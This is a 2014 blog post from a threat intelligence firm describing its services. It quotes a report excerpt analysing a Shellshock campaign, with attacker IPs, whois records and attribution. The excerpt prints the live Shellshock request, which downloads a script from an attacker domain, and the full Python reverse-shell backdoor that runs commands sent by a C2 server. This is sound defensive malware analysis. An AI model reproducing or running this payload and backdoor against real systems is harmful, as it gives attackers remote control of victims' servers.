Saturday, October 11, 2014

Shellshock and FAQ

At least three times every week I get asked by someone "What's the difference between Wapack Labs and Red Sky Alliance?" "Who is your target customer?" "What product do we deliver?" "What's your distribution look like?"

So let's start here...

Wapack Labs is an intelligence, research and analysis company. We sell information.
  • Wapack Labs authors sources and sells intelligence, research and analysis. We deliver it in many forms, to many places... Red Sky Alliance/Beadwindow, the FS-ISAC, Subscriptions, OEM, Threat Recon, etc. We publish in PDF, STIX, HTML, CSV, and JSON.
Red Sky Alliance is a crowdsourcing platform for cyber threat intelligence pro's. Discussions are deep, and at the end of the thread, they receive a finished report with analysis of the discussion.  
  • Security researchers go to Red Sky Alliance to share notes, build the story, and together, protect their networks. What happens in Red Sky Alliance, stays in Red Sky Alliance. It's private. There's no government involvement. We don't care how you interact with DSS, the regulators, or any other government organization --that's your choice. Red Sky Alliance exists to help improve your security. The private portal is ALWAYS busy. We've added university users, and just this week, another Icelandic bank.
  • For government security researchers we offer a second collaborative... Beadwindow --delivered in Threat Connect. They do not get access to the Red Sky private portal, but they do get information that they may care about. We've delivered cyber warnings, dumped credential caches and targeting, to several government agencies directly, and for others, we push stuff through Beadwindow to contacts at the 24th AF and the US MDA. None of the US Cyber Centers participate, so if you're a state, local or .gov who needs help, call us. We can help. And our stuff is UNCLASSIFIED! You can actually use it!
As an example of one of our reports, I've posted (below) a snippet from a Wapack Labs report to Red Sky Alliance members and Wapack Labs subscribers...

We published this report in it's entirety last week.

We took a bit of a different approach on what seemed to be the hottest topic of the last two weeks - Shellshock. (Need information on Shellshock? Try here.)

We're looking for use cases where we might help protect against. This is one of three case studies that we'd identified, taking advantage of Shellshock. 

You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it's gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.

So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;) 

SHELLSHOCK CASE STUDY AND INFRASTRUCTURE

Beginning on 24 September 2014, hackers and researchers began exploiting the widely publicized Shellshock bash vulnerability, described in CVE -2014-6271.  The majority of the initial activity involved mass vulnerability scanning by white hats and black hats alike. Examination of scanning activity showed a peak on September 27th with a sharp decline as of September29th . This spike and sudden decrease may be a result of what is likely wide-scale patching of the vulnerability. Alternatively, this may mark the end of exploiting the vulnerability for reconnaissance purposes and could signal a move up the kill-chain into more targeted operations.

Legacy Scamming infrastructure re-emerges with Shellshock

A recently observed instance of Shellshock in the wild took the form of a Python implemented backdoor hosted on google-traffic-analytics.com. Table 5 lists the observed originating IPs along with the Shellshock request:

Originating IPs
Shellshock Request
14.163.12.119
77.29.189.34
78.15.20.81
78.161.195.166
79.136.130.110
88.253.229.151
93.139.212.67
109.227.100.189
112.156.18.40
113.171.116.163
117.218.186.16
118.172.123.111
119.130.114.154
124.123.75.68
178.120.175.81
178.121.79.68
190.49.241.220
190.82.114.190
223.206.54.26
 () { :;}; /bin/bash -c '/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm
!/usr/bin/env python


from socket import *
import os
from time import sleep
import sys


fpid = os.fork()

if fpid!=0:

    host='stats.google-traffic-analytics.com'
    port=9091
    sockobj = None
    ############################################

    sockobj = None
    recv = False

    def connect():
        try:
            sockobj=socket(AF_INET,SOCK_STREAM)
            sockobj.connect((host,port))
            return sockobj
        except:
            return False


    while True:
        while not sockobj:
            sockobj = connect()
            print "[*] Trying to reconnect..."
            sleep(1)
            if sockobj:
                print "[+] Connected"

        recv = sockobj.recv(1024)
        #print recv
        if not recv: sockobj = False; break;
        cmd = recv.strip()
        res = os.popen(cmd).read()
        if res:
            sockobj.sendall(res)

Open source research on google-traffic-analytics.com only returned one previous hit from 2010. In August of 2010, Securi.net reported a wave of spam that affected more than 200K websites including many popular sites. Investigation of the activity revealed that they were all controlled by www.google-traffic-analytics.com. The blog reported that google-traffic-analytics.com leveraged the compromised sites as part of a widespread spamming infrastructure.

Legacy Whois Record
Current Record
Registrant Contact:
   Goga Gastoyan
   Goga Gastoyan Goga Gastoyan bash@blogbuddy.ru
   +7.4957452002 fax: +7.4957452002
   Pokryshkina d.36 kv.36
   Moscow Moscow 119602
   ru
 
Admin Name: Radovanka Janekovic
Admin Organization: Goga Gastoyan
Admin Street: Ljubljanska 6
Admin City: Bled
Admin State/Province: Bled
Admin Postal Code: 4260
Admin Country: SI
Admin Phone: +386.15765749
Admin Phone Ext:
Admin Fax: +386.15765749
Admin Fax Ext:
Admin Email: support@google-traffic-analytics.com
 

Table 5. google-traffic-analytics.com Scanning Nodes

Upon successful exploitation, a CURL request is made for http://google-traffic-analytics.com/cl.py. The Python script (cl.py) is a simple yet effective Backdoor that works on both Linux and Windows. It also has a zero detection on Virus Total [1]. The configured C2 address is hosted on subdomain stats.google-traffic-analytics.com. The downloaded python script will attempt connection C2 on port 9091 and if the C2 is listening  - a shell is opened up to the victim.

During testing, a the C2 node issued a uname –a command which prints all available information about a Linux system [2]. [Comment: No additional activity was observed.] (See Mitigations section for a SNORT signature)


The re-emergence of this domain after an apparent four year hiatus begs the question of whether it belongs to the same attackers. A Whois history report from Domain Tools lists the registrant during 2010 as “Goga Gastoyan”, (bash@blogbuddy.ru), however this changed in 2013 to the current owner “Radovanka Janekovic”. Further inspection of the records revealed Goga Gastoyan as the Admin organization in the new record – thus confirming likely attribution to the same attackers.  With the connection made to the legacy infrastructure, one could assume that this latest activity involving Shellshock could be the most recent attempt to expand the spamming network.
Table 6. Whois Record Comparison


[1] https://www.virustotal.com/en/file/052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d/analysis/
[2] http://linux.about.com/library/cmd/blcmdl1_uname.htm
[3] http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html






------------------------------------------------------

I realize this is pretty technical, but I thought it important to offer a simple slice of some of the work we do. This report is the basis for nearly everything else. These reports, when complete are farmed for placement in Threat Recon. This information, sourced by the lab, is thought to be high confidence (although we never score anything perfect!).

This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.

Have a great weekend!
Jeff